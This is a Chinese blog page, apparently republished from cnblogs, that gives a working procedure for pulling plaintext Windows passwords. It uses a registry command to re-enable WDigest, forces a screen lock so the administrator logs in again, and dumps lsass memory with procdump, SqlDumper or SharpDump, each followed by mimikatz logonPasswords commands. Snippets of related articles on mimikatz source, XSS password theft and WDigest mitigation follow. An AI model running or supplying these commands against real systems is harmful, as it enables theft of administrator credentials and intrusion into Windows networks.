mimikaz获取明文密码

一.windows2008以上不保存明文密码解决办法

在默认情况下,当系统为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,密码字段显示为null,此时可以通过以下方式开启,但需要用户重新登录后才能成功抓取。

cmd:  reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

在开启 Wdigest Auth 后,需要管理员重新登录才能抓明文密码。

强制锁屏,让管理员重新登录。

rundll32 user32.dll,LockWorkStation

二.procdump+mimikatz

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" "exit"

三.SqlDumper + mimikatz

SqlDumper.exe默认存放在C:\Program Files\Microsoft SQL Server\number\Shared,number代表SQL Server的版本目标机没有的话可以自己上传

tasklist /svc |findstr lsass.exe

Sqldumper.exe 进程ID 0 0x01100

mimikatz.exe "sekurlsa::minidump SQLDmpr0001.mdmp" "sekurlsa::logonPasswords full" "exit"

四.SharpDump+ mimikatz

https://github.com/GhostPack/SharpDump

编译生成SharpDump.exe文件大小不超10kb

进入c:\windows\temp\将debug.bin文件提取出来修改后缀bin为zip解压出来

mimikatz.exe "sekurlsa::minidump debug472" "sekurlsa::logonPasswords full" "exit"

原文地址:https://www.cnblogs.com/websecyw/p/11430986.html

时间: 2024-10-17 13:12:12

mimikaz获取明文密码的相关文章

【源码阅读】Mimikatz一键获取远程终端凭据与获取明文密码

1.前言 mimikatz框架是非常精妙的,粗浅讲一下修改的思路. 它的模块主要由各个结构体数组组成,根据传入的命令搜索执行相应命令的模块 mimikatz.c 部分代码: NTSTATUS mimikatz_doLocal(wchar_t * input) { NTSTATUS status = STATUS_SUCCESS; // 参数个数定义 int argc; // 获取输入的值,参数个数赋值 // wchar_t ** argv = CommandLineToArgvW(input,

XSS攻击:获取浏览器记住的明文密码

作者:余弦(@evilcos) 0x01. XSS获取明文密码的多种方式 我已经感受到Web潮流带来的巨大革新,尤其是最近HTML5越来越火.浏览器们在客户端瓜分着这个Web OS,只要是对用户体验好的功能,浏览器之间就会互相学习,然后去实现,但是实现总是存在一些差异,有些差异是用户体验上的,有些则可能带来安全问题. 这篇文章是想深入描述下浏览器记住用户密码这种机制带来的安全问题与实现上的一些差异性.黑客们如何通过技巧获取到浏览器保存的密码,明文. 先回到XSS本身上,XSS获取明文密码的方式有

明文密码和散列值抓取防范方法

一.单机密码抓取的防范方法 微软为了防止用户密码在内存中以明文形式泄露,发不了补丁KB2871997,关闭了Wdigest功能.windows server 2012以上版本默认关闭Wdigest,使攻击者无法从内存中获取明文密码.对于win server 2012以下版本,通过安装KB2871997补丁,可以避免攻击者获取明文密码. 通过查看注册表键值,可以判断Wdigest功能状态.如果该项值为“1”则为开启,即可以获取明文密码,如果该项值为“0”,则明文密码不会出现在内存中.开启和关闭Wd

mimikaz在waf下抓取windows明文密码

当拿到目标服务器时,我们一般会使用神器mimkaz来抓取目标服务器的明文密码,但是如果目标服务器配置了waf,mimikaz无法抓取时,这是可以将存有帐号密码的dmp文件下载到本地来使用mimikaz抓取. 实现自己搭建一个与目标机器同样的系统环境.然后利用如下命令来下载dmp文件; procdump.exe -accepteula -ma lsass.exe %COMPUTERNAME%_lsass.dmp 这个procdump.exe是微软工具包中的一个工具,不会被杀毒ban了,将该dmp下

hg211g破解获取管理员密码,可以连接路由器。默认光猫来拨号。

先通过这种方式获取telecomadmin密码:1.使用useradmin用户登录设备2.在IE地址栏输入该路径”192.168.1.1/backupsettings.html”3.点击保存设备备份配置,会得到一个设备配置的XML文件,里面包含了所有的设备配置信息,使用文本工具察看并查找内容,其中包含明文的telecomadmin密码,telecomadmin加8位数字. 宽带设置里面把连接名称里选internet连接,修改成桥接模式,下面服务模式也改成internet模式.

开发反模式 - 明文密码

一.目标:恢复或重置密码 每个有密码的程序都会碰到用户忘记密码的情况,现今大多数程序都通过E-mail的回馈机制让用户恢复或者重置密码.这个解决方案有一个前提,这个服务有一个前提,就是这个用户能够访问他在注册时留下的邮箱. 二.反模式:使用明文存储密码 在这种恢复密码的解决方案中,很常见的一个错误是允许用户申请系统发送一封带有明文密码的邮件.这是数据库设计上一个可怕的漏洞,并且会导致一系列安全问题,可能会使得未取得授权的人获得系统访问权限. 1.存储密码 首先我们设计一张表如下: 类似于这张表,

SQL反模式学习笔记20 明文密码

2014-10-17 10:50:26 目标:恢复或重置密码 反模式:使用明文存储密码 1.存储密码 使用明文存储密码或者在网络上传递密码是不安全的. 如果攻击者截取到你用来插入(或者修改)密码的sql语句,就可以获得密码.     黑客获取密码的方式有很多种: (1)在客户端和服务器端数据库交互的网络线路上接货数据包.比如使用Wireshark黑客软件. (2)在数据库服务器上搜索SQL的查询日志. (3)从服务器或者备份介质上读取数据库备份文件内的数据. 2.验证密码:同上. 3.在Emai

mimikatz+procdump 提取 Windows 明文密码

0x00 原理 获取到内存文件 lsass.exe 进程 (它用于本地安全和登陆策略) 中存储的明文登录密码. 0x01 操作 Windows10/2012 以下的版本:1.上传 procdump 执行命令转存出 lsass.dmp 文件(需要管理员权限) procdump64.exe -accepteula -ma lsass.exe lsass.dmp 2.拿到 mimikatz 文件夹执行命令读明文: sekurlsa::minidump lsass.dmp sekurlsa::logon

如何抵御社工库类的黑客攻击?在明文密码已泄露的情况下保护自己?

说到社工库,现在很流行,数据也越来越庞大.详细,其威胁程度日愈严重. 其中威胁最高的就属密码库了,也是数量最大,影响范围最广的. 密码库主要来源就不说了,各种拖库-- 其中密码形式主要分这几种: 第一种是未加密的明文密码,威胁程度最高.(不得不说这种储存明文密码的站点有多么的二逼!更可悲的是这种站点有很多!!) 另一种是加密过的密码密文,威胁程度视加密等级而定. 第三种是破译成本很低的密码密文,例如仅一次MD5,等低强度加密算法,威胁程度最高. 其中无法破译的密文,情况还好点,暂时没什么大的影响